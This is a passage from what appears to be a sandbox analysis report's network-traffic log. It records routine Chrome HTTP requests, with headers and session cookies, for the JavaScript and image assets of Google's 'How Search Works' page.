NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/lHimDk5Y.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/v6TSeaUt.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/EWy3lfep.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/CiLn66Ai.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/BLvkbcMJ.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/_OAi-NRQ.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/BhmWRCy0.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /fvNhHugJAnsAS2DJW1V3kQ-0lsCTl2eDWV9NW2p4KXStsynp7EjqGSiACH9xSdCIvPvw0z9l_L7kOtfVZH07iQuasGIGWyFqhpdY=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /zVX_dAFZOrsdAax2aYItNILgBV4SU93ES5ih12EORRQ4TqiRa7eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/vQ8El_Rl.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/rwBjrn-0.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/IniIGeRU.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/bAPu5B1A.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/bS7WqXuL.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/lHimDk5Y.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/CiLn66Ai.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/44SUZn7a.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/hIvGK13F.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/BLvkbcMJ.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/J8wBfiw3.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; 